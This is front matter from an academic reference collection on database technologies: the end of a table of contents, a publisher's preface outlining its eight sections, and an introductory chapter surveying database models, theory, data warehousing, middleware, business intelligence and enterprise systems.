Chapter 8.5. Looking for Information in Fuzzy Relational Databases Accessible Via Web ............ 2448 Carmen Martínez-Cruz, University of Jaén, Spain Ignacio José Blanco, University of Granada, Spain M. Amparo Vila, University of Granada, Spain Chapter 8.6. Integrating Heterogeneous Data Sources in the Web ................................................... 2472 Angelo Brayner, University of Fortaleza, Brazil Marcelo Meirelles, University of Fortaleza, Brazil José de Aguiar Moraes Filho, University of Fortaleza, Brazil Chapter 8.7. Reverse Engineering from an XML Document into an Extended DTD Graph ........... 2489 Herbert Shiu, City University of Hong Kong, Hong Kong Joseph Fong, City University of Hong Kong, Hong Kong Chapter 8.8. Evaluating XML-Extended OLAP Queries Based on Physical Algebra ..................... 2510 Xuepeng Yin, Aalborg University, Denmark Torben Bach Pedersen, Aalborg University, Denmark Chapter 8.9. Vertical Fragmentation in Databases Using Data-Mining Technique .......................... 2543 Narasimhaiah Gorla, American University of Sharjah, UAE Pang Wing Yan Betty, Hong Kong Polytechnic University, Hong Kong Chapter 8.10. Control-Based Database Tuning Under Dynamic Workloads.................................... 2564 Yi-Cheng Tu, University of South Florida, USA Gang Ding, Olympus Communication Technology of America, Inc., USA Chapter 8.11. Adoption, Improvement, and Disruption: Predicting the Impact of Open Source Applications in Enterprise Software Markets ......................................................... 2572 Michael Brydon, Simon Fraser University, Canada Aidan R. Vining, Simon Fraser University, Canada Chapter 8.12. 3-D Virtual Worlds in Education: Applications, Benefits, Issues, and Opportunities.............................................................................................................................. 2595 Brenda Eschenbrenner, University of Nebraska-Lincoln, USA Fiona Fui-Hoon Nah, University of Nebraska-Lincoln, USA Keng Siau, University of Nebraska-Lincoln, USA Chapter 8.13. Legal Protection of the Web Page as a Database ....................................................... 2616 Davide Mula, LUISS Guido Carli, Italy Mirko Luca Lobina, University of Cagliari, Italy Chapter 8.14. Deterministic Motif Mining in Protein Databases ..................................................... 2632 Pedro Gabriel Ferreira, Universidade do Minho, Portugal Paulo Jorge Azevedo, Universidade do Minho, Portugal
Chapter 8.15. Mining Allocating Patterns in Investment Portfolios................................................. 2657 Yanbo J. Wang, University of Liverpool, UK Xinwei Zheng, University of Durham, UK Frans Coenen, University of Liverpool, UK Chapter 8.16. Introducing Elasticity for Spatial Knowledge Management ...................................... 2685 David A. Gadish, California State University Los Angeles, USA
xxxii
Preface
The field of database technology has become vitally important to information and technical science as the world turns more and more frequently to technology for the storage and interpretation of intangible media. As the information age booms, so does the need for cutting edge research and technology with the purpose of understanding, maintaining, and improving database management. Database architecture, data mining, and data warehousing are each vitally important areas in which practitioners, researchers, scholars, and academics have continued to work to develop the most elegant and efficient database technologies. During this period of time, numerous researchers and academicians have developed a variety of techniques, methodologies, and measurement tools that have allowed them to develop, deliver and at the same time evaluate the effectiveness of several areas of database technology. The critical importance of these technologies and methodologies continues to inspire an abundance of new, state-of-art literature related to all aspects of this discipline, allowing researchers and practicing educators to learn about the latest advances in the field of database technologies. Due to the constant search for improved methods and technologies, it is a challenge for researchers and experts in this discipline to take in the volume of information available on these innovations, and to develop and deliver more novel methodologies and techniques utilizing new technological invention. This collection endeavors to provide the most comprehensive, in-depth, and recent coverage of all issues related to this important field, as well as to offer a single reference source on all conceptual, methodological, technical and managerial issues, opportunities, future challenges and emerging trends related to database technologies. Information Science Reference is pleased to offer a four-volume reference collection on this foundational discipline, in order to empower students, researchers, academicians, and practitioners with a comprehensive understanding of the most critical areas within this field of study. This collection entitled, “Database Technologies: Concepts, Methodologies, Tools, and Applications” is organized in eight (8) distinct sections, providing the most wide-ranging coverage of topics such as: (1) Fundamental Concepts and Theories; (2) Development and Design Methodologies; (3) Tools and Technologies; (4) Utilization and Application; (5) Organizational and Social Implications; (6) Managerial Impact; (7) Critical Issues; and (8) Emerging Trends. The following provides a summary of what is covered in each section of this multi-volume reference collection: Section I, Fundamental Concepts and Theories, serves as a foundation for this extensive reference tool by addressing crucial theories essential to the understanding of database technologies. Chapters such as, “A Generalized Comparison of Open Source and Commercial Database Management Systems” by Theodoros Evdoridis and Theodoros Tzouramanis as well as “Highly Available Database Management Systems” by Wenbing Zhao provide an excellent framework in which to understand the fundamental concepts of database technologies. “Conceptual Modeling Solutions for the Data Warehouse” by Stefano Rizzi offers illuminating insight into the conceptual framework of data warehouse design, while chapters
xxxiii
such as “Approaches to Semantics in Knowledge Management” by Cristiano Fuggazza, David Stefano, Anna Montesanto, and Cesare Rocchi address the various approaches to semantics and the challenges of creating a system with its own unique semantics. With over 25 chapters comprising this foundational section, the reader can choose from a compendium of expert research on the elemental theories underscoring the use of database technologies. Section II, Development and Design Methodologies, presents in-depth coverage of conceptual architecture frameworks to provide the reader with a comprehensive understanding of the emerging technological developments within the field of database technologies. “Design of a Data Model for Social Network Applications” by Susanta Mitra, Aditya Bagchi, and A. K. Bandyopadhyay offers a data model for storage and retrieval of social network information while “Database Design based on B” by Elviar Locuratolo provides a detailed look at the integration of the ASSO feature in B. From broad examinations to specific discussions on database technologies such as Efrem Mallach’s, “A Database Project in a Small Company (or How the Real World Doesn’t Always Follow the Book)” the research found within this section spans the discipline while also offering detailed, specific discussions. From basic designs to abstract development, chapters such as “Web Data Warehousing Convergence: From Schematic to Systematic” by D. Xuan Li, J. Wenny Rahayu, and David Taniar and “Designing Information Systems Capabilities to Create Business Value: A Theoretical Conceptualization of the Role of Flexibility and Integration” by Christoph Schlueter Langdon serve to expand the reaches of development and design technologies within the database technology community. This section includes over 20 contributions from researchers throughout the world on the topic of database technologies within the information science and technology field. Section III, Tools and Technologies, presents an extensive coverage of various tools and technologies available in the field of database technology that practitioners and academicians alike can utilize to develop different techniques. Chapters such as Emmanuel Udoh’s, “Open Source Database Technologies,” offer a look at the open source database technology available and discusses its use in comparison with the popular closed source databases. A specific data mining algorithm is looked at in chapters like “MILPRIT*: A Constraint-Based Algorithm for Mining Temporal Relational Patterns” by Sandra de Amo, Waldecir P. Junior and Arnaud Giacometti. It is through these rigorously researched chapters that the reader is provided with countless examples of the up-and-coming tools and technologies emerging from database technology. With more than 20 chapters, this section offers a broad treatment of some of the many tools and technologies within the database technology community. Section IV, Utilization and Application, discusses a variety of applications and opportunities available that can be considered by practitioners in developing viable and effective database management systems. This section includes more than 25 chapters such as “Enhancing UML Models: A Domain Analysis Approach” by Iris Reinhartz-Berger and Arnon Strom which addresses the problems of completeness and correctness within the UML modeling language by advocating the use of application-based domain modeling. Additional chapters such as Christopher B. Mayer and K. Selçuk Candan’s, “Large-Scale ASP Replication of Database-Driven Portals” discuss the ultimate necessity for logic and database replication in web portals to keep up with increasing user demand. Also considered in this section are the architecture and characteristics of mobile transactions from the database perspective within Z Abdul-Mehdi, A Mamat, H Ibrahim, and M Dirs’ chapter, “Transaction Management in Mobile Databases.” Contributions included in this section provide excellent coverage of the use of database technologies and how they can be applied to the various types of database use. Section V, Organizational and Social Implications, includes a wide range of research pertaining to the social and organizational impact of database technologies. In this section, you will find chapters such as Roberta A Bartsch’s, “Misuse of Online Databases for Literature Searches.” This study describes the
xxxiv
use and misuse of online library databases and attempts to help lecturers structure their assignments in such a way as to avoid misuses by increasing students’ level of information literacy. In “Fine-Grained Data Security in Virtual Organizations” by Harith Indraratne and Gábor Hosszú, the concept of controlling the information available to a user down to the row of data provided by using fine-grained access control is thoroughly discussed. The increased importance of privacy protection combined with the demand for accessibility of information is discussed in George T. Duncan and Stephen F. Roerhig’s chapter “Reconciling Information Privacy and Information Access in a Globalized Technology Society.” Section VI, Managerial Impact, presents contemporary coverage of database technologies, which is more specifically related to the corporate and managerial utilization of database management systems, and how these technologies can be facilitated within organizations. Chapters include important comparisons between business technologies, such as Emmanuel Udoh’s “Database Integration in the Grid Infrastructre” which discusses Oracle 10g and argues that businesses will embrace enterprise database grids for their various beneficial attributes. The availability of databases for online database searches by their users is discussed in “Database High Availability: An Extended Survey” by Moh’d A. Radaidah and Hayder Al-Ameed. Equally as crucial are chapters such as “Empirical Assessment of Factors Influencing Success of Enterprise Resource Planning Implementations” by Fiona Fui-Hoon Nah, Zahidul Islam and Mathew Tan, which discusses key factors which influence the success or failure of ERPs. Section VII, Critical Issues, contains 25 chapters addressing issues such as improving storage for semantic models, improving the accuracy of queries to databases with integrity constraints, and the security of databases containing sensitive information. Within the chapters, the reader is presented with an in-depth analysis of many of the current and relevant issues within this fundamental field of study. The section includes Russel Pears and Bryan Houlistan’s “Optimization of Multidimensional Aggregates in Data Warehouses” which discusses the use of the prime factor scheme to compress data within a warehouse and compares it with the Haar wavelet. The particular idiosyncrasies involved in a multimedia database and a proposed data model to answer those unique functionalities is discussed in “Managing Uncertainties in Image Databases” by Antonio Picariello and Maria Luisa Sapino. These and the other chapters in this section combine to provide a wealth of debate on a variety of theoretical topics as they relate to database technologies. The concluding section of this authoritative reference tool, Emerging Trends, highlights research potential within the field of database technology, while exploring new areas of study for the advancement of the discipline. Introducing this section is a chapter entitled “From Databases to Ontologies” by Guntis Barzdins, Janis Barzdins, and Karlis Cerans, which presents the UML profile for OWL as a bridge between legacy relational databases and OWL ontologies. Providing a view of a generalized measurement ontology meant to interact with the semantic web is “A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web” by Henry M. Kim, Arijit Sengupta, Mark S. Fox, and Mehmet Dalkilic. This chapter argues that these generalized ontologies are needed as a first step toward creating more detailed domain-specific ontologies. Concluding this section is an article by David A Gadish called “Introducing Elasticity for Spatial Knowledge Management.” This chapter discusses the property of elasticity as it relates to spatial databases and the management of inconsistencies between related spatial data. Several areas of emerging trends and suggestions for future research within this constantly evolving discipline are found in these 16 chapters concluding this exhaustive multi-volume set. Although the primary organization of the contents in this multi-volume is based on its eight sections, offering a progression of coverage of the important concepts, methodologies, technologies, applications, social issues, and emerging trends, the reader can also identify specific contents by utilizing the extensive indexing system listed at the end of each volume. Furthermore to ensure that the scholar, researcher
xxxv
and educator have access to the entire contents of this multi volume set as well as additional coverage that could not be included in the print version of this publication, the publisher will provide unlimited multi-user electronic access to the online aggregated database of this collection for the life of the edition, free of charge when a library purchases a print copy. This aggregated database provides far more contents than what can be included in the print version in addition to continual updates. This unlimited access, coupled with the continuous updates to the database ensures that the most current research is accessible to knowledge seekers. Database technology is a discipline that will always be critical to the information technology field as its subject matter is a foundational piece of computing technologies. The use of databases for information storage and analysis will only continue to grow as the demand for greater quantities of knowledge and faster database systems increases. Practitioners in the field combined with researchers and scholars will continue to look for ways to improve retrieval and interpretation of information as well as its format and storage capabilities. As the field continues to grow, develop, and improve an abundance of new and innovative research on database management systems and their various implications and uses will continue to persist. The diverse and comprehensive coverage of database technologies in this four-volume authoritative publication will contribute to a better understanding of all topics, research, and discoveries in this developing, significant field of study. Furthermore, the contributions included in this multi-volume collection series will be instrumental in the expansion of the body of knowledge in this enormous field, resulting in a greater understanding of the fundamentals while fueling the research initiatives in emerging fields. We at Information Science Reference, along with the editor of this collection, hope that this multi-volume collection will become instrumental in the expansion of the discipline and will promote the continued growth of database technologies.
xxxvi
Database Technologies:
Concepts, Methods, Tools and Applications John Erickson University of Nebraska–Omaha, USA
INTRODUCTION Since their development more than 45 years ago, databases have played an ever larger role in not only how businesses operate, but also in the structure of business itself. The saturation rate of database and database technologies into business has reached nearly 100 percent, and most medium and large businesses could not even operate today without a database. In addition, many small businesses such as those who buy and sell on E-Bay depend heavily upon databases, even though the databases may not be directly used by the businesses themselves. In a time when many businesses are moving (or have already moved) to the Web, the integration of their databases with Web technologies has assumed a critical role in gaining or maintaining the elusive competitive advantage. The editors of this series in general and volume specifically have assembled what they consider to be the best materials contained in other IGI books, research journals, case studies and general encyclopedias, on the subject of database and presented it here to serve as a fully inclusive and comprehensive one-stop reference source. This volume presents coverage in five separate but related areas: Fundamental Concepts and Theories, Tools and Technologies, Application and Utilization, Organizational and Managerial Issues, and Emerging Trends. In that context, this first chapter will briefly introduce each area and provide a basis for the subsequent chapter discussions.
FUNDAMENTAL CONCEPTS AND THEORIES Section 1, Fundamental Concepts and Theories, will present a common definition of a database and related components. Then the primary database models are presented, with some historical background on each. Finally, Section 2 will briefly explore a select number of the theories underlying the relational model.
xxxvii
Database Definition and Components A database can be defined as a “self-describing collection of integrated records” (Kroenke, 1995). This definition is one of the more succinct and thorough, but it is not necessarily standard, nor is it unique, although most distinct definitions have much commonality. An informal Google search of the words “database definition” returned 23 distinct results (Google, 2008). This leads to basic problems for beginners to the database environment. Terminology is also used interchangeably for some specific elements of database, causing even more confusion. However, a database is basically a way to capture, store, organize, and present data as information, typically for business, although many other uses for databases and database technologies have emerged since formally defined databases were created. A formal database is comprised of several elements. First, the data itself is housed in data structures usually called files or tables. Second a piece (or pieces) of software called the DBMS (Database Management System) handles several critical tasks such as how the data is managed (input, processed, output, and stored), basic security, and replication/backup, among others. Finally another piece of software, the user interface application handles how users interact with the database. Some database products have merged the DBMS with the user interface, or allow creation of a custom interface. Most textbooks on database design include three components as necessary to formally constitute a database management system; a data definition language (DDL), a data manipulation language (DML), and a data dictionary. The third component, the data dictionary meets the definitional requirement that a database be self-describing, or to contain a meta-data element. For that reason, spreadsheet applications (i.e. Excel, Lotus 123, etc.) are not considered to be a database, although such programs may support database operations or be used to upload to or download from a database. The data dictionary describes each piece of data that is stored in a table, including its name, data type (such as text or numeric), length, and where it occurs in a table (or tables), among other descriptional components of the data element. In most modern businesses, data captured from operations via Transaction Processing Systems (TPS) is almost universally structured and deposited into a database for presentation as presumably actionable information to managers at the operational, management and strategic levels of the organization. Historically, databases were seen as repositories of organizational data and information, and did not include extensive analytic tools other than query creation. That has changed considerably with the advent of data warehouses and data mining. Finally, a relational database will not “work” without relationships. Relationships are created through the process of normalization, and represent the very core of why the relational model is so successful. A fully normalized database will minimize the redundancy of data stored, usually resulting in the key field from one table being stored in another table as a foreign key. The storage of foreign keys in a table depicts the relationship between the two tables in question, and allows queries based on relational algebra to work. The depiction of the arrangement of the data structures and the relationships between them most often takes the form of an ERD (or EERD) – Entity-Relationship Diagram and Enhanced EntityRelationship Diagram. The E-R model, first described in detail by Chen (1976) is most often used as a modeling tool to help design the database. There are several versions of the E-R model in existence, and there appears to be no completely agreed upon version as the standard. For example, Batra, Hoffer, and Bostrom (1988) were among the first who began to research the use of Enhanced E-R diagramming as a means to include object-oriented structures, such as sub-types/supertypes, and generalization/specialization into database modeling. Finally, a combined DDL and DML, almost always SQL in practice, (Structured Query Language) is used to create the data structures and define the elements in the data dictionary. SQL is recognized as a standard, if not the standard, language used in relational databases. Soon after Codd (1970) published
xxxviii
his defining relational database model paper, IBM began developing an application that would implement a database using the relational model. The project included early versions of the query language, and ended with published standards in the late 1970s. The first commercial relational database product released was Oracle in 1979, which also used SQL as the query language.
Database Models and Theories Database Models The Relational, Hierarchical, and Network Models By far the most prevalent database design in use today is based on the relational model. The relational model was first described and detailed in 1970 by E. F. Codd. The relational model arose from a specific area of mathematics called relational algebra. Codd showed how a relational data model could be used to define and structure large databases for organizations. The relational model supplanted the more common (at the time) hierarchical and network models. IBM and North American Rockwell were the primary developers of the hierarchical and network models in the mid-to-late 1960s, beginning with the massive data storage requirements and problems posed by the Apollo space program (Kroenke, 1995). The initial problems with the relational model were its processing, memory and storage requirements, coupled with a lack of DBMS and front end applications created to use it. Even though the relational model preceded the desktop computer by almost a decade, the model taxed most mainframes to nearly the limits of their capacity, and therefore the relational model did not gain a lot of acceptance or practical application until the early to mid 1980s. Since that time however, the relational model has dominated the database market with little challenge from other approaches. The Object-Oriented Model Object-oriented programming languages have arguably become the most popular means of creating applications in the current environment. Data and procedures (often seen as representing processes) are combined into objects in the OO (Object-Oriented) paradigm. This approach allows creation of reusable pieces of code and use of the same piece of code in multiple places within a program (i.e. dll – dynamic link library files in MS Windows®). While programming languages such as C++, Java, VB.net, and many others have become popular, and some are deeply entrenched into Internet applications, many businesses and the underlying relational data model are still for the most part transactionally or process based. Out of this situation sprang the OO database model, based on the OO processing paradigm rather than the transactional paradigm. Some of the limitations of the relational model are addressed, again arguably, by the OO model. Some of the limitations include: complex object handling (voice or video as storage “data” nodes), general data-type support, performance degradation when a query needs a large number of tables, the process orientation versus the OO orientation, limited or no support for various versions of the same object (Watson, 1999). The OO database model supports many of the concepts and ideas that form the basis of the OO paradigm, and also links very tightly with the OO programming languages. The first ODBMS standard, ODMG 1.0, was released in 1993 (ODBMS.org). According to the same site, sales of OODBMS products peaked in about 2000 and have decreased steadily since that time. The ODMG released a final standard in 2001 and disbanded shortly thereafter. Based upon these occurrences, at this point it seems unlikely that the OODBMS model will supplant the relational model anytime soon.
xxxix
The Object-Relational Model The basic dissimilarities and tensions between the now traditional relational data model and the more recent OO model have given rise to a hybrid type of database model; the object-relational model. The object-relational model begins with the relational model and query schemas, and modifies them to include support for object oriented elements such as objects, classes, and inheritance etc. It is common for current ORDBs (Object-Relational Databases) to include facilities that allow the users to define their own data types, called UDTs (User Defined Datatypes). This allows definition and use of objects and classes in what is otherwise essentially a relational database (RDB). In this way, ORDBs attempt to bridge the gap between OODBs and RDBs. The object-relational model has made some advances in a world now dominated by the OO paradigm and programming languages, and should become more commonly used in the future, although that is of course somewhat dependent upon user/organizational acceptance and application and tool development.
Theories Underlying the Database Area Many theories underlie the database area, and could comprise several volumes of text in themselves. Therefore, this section of the chapter will briefly highlight a select few theories. Early thought on computer systems design and architecture in general emerged roughly from cognitive psychological models of human information processing, or in other words, how the biological brain operates. It made sense then to try to build computer and information systems processing around those models. The Newell Simon Model is first discussed as an underpinning for the reasoning behind why information systems and databases are developed. Next, Database Theory is presented. Database Theory generally falls into to two separate branches; Relational Database Theory, and Transaction Theory. Each of those areas has sub-areas of research; with Dependency Theory, Universal Relations Theory, and Acyclic Hypergraph Theory as underlying research streams for Relational Database Theory, and Automaticity of Transactions, Consistency of Replicated Data, and Reliability in the Face of Hardware and Software Failures as the foundations of Transaction Theory (Ullman, 1987). The Newell-Simon Model Simon and Newell developed their idea of how humans process information in the late 1960s and early 1970s. They proposed that humans deal with information by means of a processor that is connected to memory that includes both data and processes (Newell and Simon, 1972). They further proposed that in order to conduct operations, the processor recalls data and processes from memory. Of course human processing has some well known limitations in terms of both processing and memory. For example, Miller (1956) found that humans process information in chunks and can hold and operate on between 5 and 9 chunks of data simultaneously. Limitations in human memory and processing are two primary drivers of technological development, since using technology, we can build systems to augment and surpass what we are able to accomplish through manual calculations and paper-based storage systems Newell and Simon’s model can be used to help understand how decisions are made in organizations and from that understanding, information about how best to design and implement information systems and databases can be deduced. An example would be designing user interfaces. The systems analysts examine the specific roles and tasks assigned to each distinct job in an organization. They can then create the user screens around the results of that analysis, providing exactly the data and information each user needs to execute their assign job, but simultaneously not providing too much or unnecessary
xl
data or information. Too much information, known as information overload, as well as other security and privacy issues are critical elements in information system and database design. Overall, the Newell Simon model does not really address database development or production per say, but rather speaks to how and why information systems in general are developed. The Theory of Relational Databases As previously noted, Relational Database Theory coalesced in 1970 with Codd’s paradigm shifting paper. But before that, in the early 1960s Bosak et al. (1962) had already completed some of the theoretical groundwork that provided a springboard for Codd and later database theoreticians, by developing a relational algebra that detailed operations on single files. Other mathematical theorists quickly followed and expanded those ideas leading ultimately to Codd’s creation (Kuhns, 1967; Childs, 1968; DiPaola, 1969, and Fillat and Kraning, 1970). Building on Codd, Armstrong developed a more rigorously sound theoretical framework (1974). While many other researchers took up the theory torch from that point, one notable mention is Bernstein, who alone and severally with other researchers formalized the idea of normalization. Most importantly, his work with Beeri (1979) launched his interactions with other interested researchers in that area, which fueled even more research into normalization and related topics. These research efforts lead to enhancements in the areas of Dependency Theory, with Fagin (1977) clarifying the problems and solutions related to multi-valued dependencies. Fagin’s efforts were only the beginning of the drive to understand the issues related to normalization. Fagin followed with theoretical framework research in the areas of Universal Relations Theory (Fagin, Mendelzon, and Ullman, 1982) and Acyclic Hypergraph Theory (1983). Transaction Theory Transaction Theory deals in general with managing concurrency in database transactions. What this really means is how databases can be designed to handle situations in which two or more users attempt to modify the same record in a table at the same point in time. Stearns, Lewis and Rosenkrantz (1976) provided some seminal research into concurrency, upon which much of the later work was based. One of these (Hadzilacos, 1987) went to great lengths to formally and rigorously prove many of the previously proposed, but unsubstantiated ideas of a Reliability Theory for database concurrency. Transaction Theory and its sub-genre of research, and Relational Database Theory, with its related research specialties have allowed the relational database model to dominate the database industry for the past 25 years, and though a combining of the relational model with the OO database model has become popular recently, the relational model seems likely to remain the best choice for the foreseeable future.
TOOLS AND TECHNOLOGIES Database tools and technologies include data warehouses and data mining. These two above many of the other technologies have made a huge leap possible for the analytic side of the database arena. Another area that has impacted database development substantially is that of the Web. Electronic business and electronic commerce have exploded for many companies into a primary distribution channel for some companies and organizations. Many tools and technologies that have been on the forefront of development are related to middleware development. Middleware is typically software that resides between a data store on one side and a different and usually incompatible application where the data is captured or collected. Examples of technologies in this category would have to include XML (Extensible Markup Language), Java, CORBA (Common Object Request Broker Architecture), SOAP (Simple Object Ac-
xli
cess Protocol), and other similar languages, architectures or protocols. Section 3 will first cover data warehouses and data mining, followed by a brief discussion of middleware. The section will conclude with an examination of effect of the Web upon database development.
Data Warehouses Once the relational data model took over the database scene and relational databases went into production, decision makers in the organizations realized the value of the data and information contained in the database. They knew that now they would not have to manually search through dated reams of paper or “flat” computer files to locate actionable items critical for their decision making needs. However, the need to access the data in the database for analysis comes at a premium for the production response of the database. A database can be seen as a dynamic entity that changes regularly, if not almost continuously during production, as the company uses it to capture data from operational transactions and processes. If the processing time is degraded because of complex analyses, then users and ultimately customers are likely to be negatively impacted. This seems to be in direct opposition to the goal of enhancing the customers’ experience, and brings to light what could be said to be a paradox of databases. A solution to the problem was identified quite early on in the race to adopt relational databases; why not create a static snapshot of the database, of what it “looked like” at a given point in time? Thus was born the data warehouse; a series of snapshots in time of the state of the database. Then, separating the production database from the warehouse, business analysts could execute their queries and conduct their statistical procedures at their leisure. However, more was needed. Analysts soon noted that the normalized data found in a database was often difficult to understand, so they proposed that a data warehouse contain a component that could denormalize that data, so that it would make more sense to the typical user. Next, decision makers thought that external data, coupled with the internal data of a database and data warehouse, would provide the so-called icing on the data cake. Finally, coupling the data warehouse with CRM (Customer Relationship Management), SCM (Supply Chain Management), ERP (Enterprise Resource Planning), and KM (Knowledge Management) tools added the most recent touches to the data warehouse environment (Cunningham, Song and Chen, 2006 and Nilakanta, Miller, and Zhu, 2006) Most data warehouses contain a fairly standard component complement that includes at a minimum a set (or sets) of internal data sources, one or more external data sources, an extraction and transform facility, a directory for services provided, a set of analytic tools, and a user interface (Laudon and Laudon, 2007). Inmon and Hackathorn (1994) offered the following as a formal definition of a data warehouse; “…A subject-oriented, integrated, non-volatile collection of data used in support of management decision making processes.” Data warehousing has taken a firm hold in business, with more than 90% of larger companies claiming to have and use a data warehouse by as early as the late 1990s (McFadden, Hoffer, and Prescott, 1999). By the early 1990s many of the technologies and tools were in place for data warehouse development and deployment, but the adoption rate at that time was relatively slow because of the prohibitive costs. As the decade came to a close, the technologies and storage costs dropped significantly, and the idea of implementing a data warehouse became much more attractive. Then, as a critical mass of companies adopted data warehousing, it has now in the last years of the current decade become a competitive necessity rather than a competitive advantage for many organizations.
xlii
Middleware A necessary constraint for database design, development, implementation, and operations is that the data and data structures be isolated from the users to prevent security problems, inadvertent changes or deletion of data and the underlying structures and other issues. This problem becomes more critical as many businesses are moving to engage in electronic commerce or mobile commerce. DBMS (Data Base Management System) software has been the traditional catch-all name for applications that create this necessary separation of data and users. Some, perhaps even many or most, DBMS packages are integrated to a large extent with the database itself. There are benefits to this approach in that the same company that created the database also created the DBMS and that implies much interoperability. However, as businesses change to meet new consumer demands, they are faced with a set of problems involving their database. First, how stable is the data and data structures in the database? If proper design principles were followed during the original development, the data and data structures should be relatively stable. If not, then the database itself might need redesign, which means a very large investment in time and other resources for the business. The second problem can be the more troublesome for many organizations; that of the obsolescence of the DBMS. In other words, as time passes the security, queries, and data sources feeding the database will likely change, and if the DBMS cannot support the changes required of it, the business will find itself looking for a solution. If the database itself is stable, as previously discussed, then there can often be no need to start from scratch, but rather implementation of a new DBMS or similar type of application to replace the old DBMS can be a valid solution. The solution often involves an overhaul of the DBMS or implementation of a new DBMS. In addition, if the data sources have changed, for example in a new e-commerce application, then the data collected on a Website needs to be formatted and structured so that it will match with the appropriate data elements in the database. In any of the cases, except a complete new database, software needs to be written that either replaces or overlays the existing DBMS. The new software that performs this connection function is often called middleware, since it sits between or connects the user and the database itself. XML (eXtensible Markup Language) is a programming language that has emerged as one of the enablers of e-commerce and e-business. One of the original languages used for Web page creation was HTML (Hypertext Markup Language), and at that point in time, XML did not exist. Both HTML and XML are derived from a parent language called GML (General Markup Language). The languages are tag-based, and in HTML, the tags were all predefined in the language syntax, and extensions to allow user defined tags were minimal or non-existent for the most part. What this meant to companies that wanted to do business via their Web sites is that the ways to capture data were cumbersome and inefficient at best, and almost unworkable at worst. As a result, XML was designed to allow users to define their own tags, which in turn meant that applications could be created that collected data on the web pages, and deposited it directly into the database. Much research has been done with regard to integrating XML data into databases and further, into data warehouses. Among some of the more recent research efforts, Yin and Pedersen (2006) developed simplified queries and a physical query algebra that, according to their claim, matched performance of queries on integrated databases. Zhang, Liu, Ling, Burckner, and Tjoa (2006) proposed a framework for mining XML based data for association rules. They claimed that their approach was more efficient than the then-current best practice of repetitive scans of the (XML) data. Zhao and Siau (2007) proposed the use of a data warehouse metamodel as a framework or architecture to conduct information mediation. Information mediation is a means used to resolve data differences that result from collecting data from online sources, such as XML based applications.
xliii
APPLICATION AND UTILIZATION Databases, data warehouses, and the technologies underlying them do not possess any really innate value, unless the organization can find new and novel ways to use them that might help to provide competitive advantage. This section will discuss a number of the uses that the database, data warehouse and related technologies are put to. First, OLAP (On Line Analytical Processing) is briefly discussed, followed by a short synopsis of Business Intelligence. The section next moves to the subject of text mining, and closes with a discussion of enterprise applications that make use of database technologies including ERP (Enterprise Resource Planning, SCM (Supply Chain Management), CRM (Customer Relationship Management), and KM (Knowledge Management) systems.
Online Analytical Processing Database technologies often revolve around analysis and new and novel means to conduct analysis. In the data mining area, OLAP was among the first areas that tools were created for. As previously discussed, Yin and Pedersen (2006) developed a physical query algebra that they proposed would ease the processing burden of OLAP analyses, especially on quickly changing data sets such as financials. Tools such as these allow users more flexibility to create better uses for the mountains of data that organizations are now storing in their databases and warehouses.
Business Intelligence In addition, given the large data sets now available, it is possible to conduct revealing and sophisticated inferential and predictive statistical analyses that provide much better point estimates of sales or other critical KPIs (Key Performance Indicators). Key Performance Indicators usually refer to the metrics that a manager or employee is tasked with in terms of responsibility (and usually also action authority) for their job. Business Intelligence tools such as these allow Performance Dashboards to be created that provide at-a-glance details regarding KPIs, while at the same time providing the analytic tools necessary should a deficiency be indicated by the KPI or Dashboard.
Text Mining, Security, and Privacy In the area of data mining, concerns often arise on issues related to consumer or personal privacy. Some data mining, and more recently text mining applications have brought this problem to the public, and researchers have begun to address the issue from both sides of the question. First, is there a way to preserve individual privacy in light of Homeland Security needs and other national security issues? Thuraisingham (2005) described a way to help preserve privacy via what was termed privacy constraint processing, which is a set of rules imposed on the data set that is designed to maintain the privacy of the individual. Another application of data mining technology is in the area of text mining. Text mining is similar to data mining in that it attempts to recognize and return query-based requests for information. However, text mining goes much farther and extends the idea of data mining by allowing what are called free-text searches of many different data sources, and then examining the returned data set for patterns. The tool was proposed by Thompson (2005) and users would be able to search and cross reference a single name by searches of many different global data sources such as magazines, newspapers, etc. Obviously, this too
xliv
has important implications for national security on one side, while on the other there are serious privacy concerns as to who would have access to the tool and what its proper and allowable uses are.
Enterprise Systems Enterprise systems are intended to span the organization in terms of functional areas, while also serving the various hierarchical levels, typically meaning Operations, Management and Upper Level Management (Strategic). Most typologies include ERP, SCM, CRM, and KM as types of Enterprise systems. ERP systems were originally intended to consolidate the various internal systems in the organization into one cohesive and albeit complex system. That meant to the extent possible that the organization would migrate the separate databases into one that spanned the entire organization. That meant that a successful database design and construction lies at the very core of nearly all successful ERP implementation projects. ERPs are purported to incorporate best-of-class practices and processes and were originally designed and intended to help the adopting organization maximize their internal operating efficiencies. Organizations also began looking at ways to improve the efficiencies of the relationships with their business partners and that usually meant some type of SCM system. This was a bit trickier than “simply” tweaking the internal operations of the organization as with ERP (note here that an ERP implementation is arguably one of the most difficult projects many companies have ever attempted), because it meant connecting the systems of two or more organizations intimately enough to allow product to be followed from raw material to finished good. That means connecting two or more databases together to share data, often via a Web application of some type. Some exemplars of this in the business world include Wal-Mart (Retail Link system), Dell Computers, and Cisco Systems. CRM system creation followed a bit different route, likely emerging first in service companies such as the hotel and banking industries. CRMs capture and consolidate data that spans functional areas and uses it to present a comprehensive picture of individual customers that identifies the most profitable ones, and manages the direct contact experience to maximize the customer experience as well as the company’s profit. CRMs naturally depend heavily upon the underlying databases and database technologies. Finally, KM systems are intended to “actively manage and leverage” the stores of knowledge in an organization (Laudon and Laudon, 2007), particularly referring to explicit knowledge capture, storage, dissemination and transfer. Systems of this type may be as simple as a help desk that answers frequently asked questions about a particular subject, or as sophisticated as an active knowledge repository where institutional memory is pursued and stored in an addressable form (database).
ORGANIZATIONAL AND MANAGERIAL ISSUES This section speaks to the issues regarding the impact of databases and database technologies on the organization itself, and issues managers may find themselves faced with regarding database and database technologies. The first areas discussed are those of the relationship between organization size and data quality, organizational memory, and information processing. Next the problems organizations face when migrating to a Web-based environment are presented, followed by issues organizations must deal with when adopting or implementing systems, such as ERP systems, that include a large database or database technology component. The section ends with a short discussion of the impact of social networks on the underlying data.
xlv
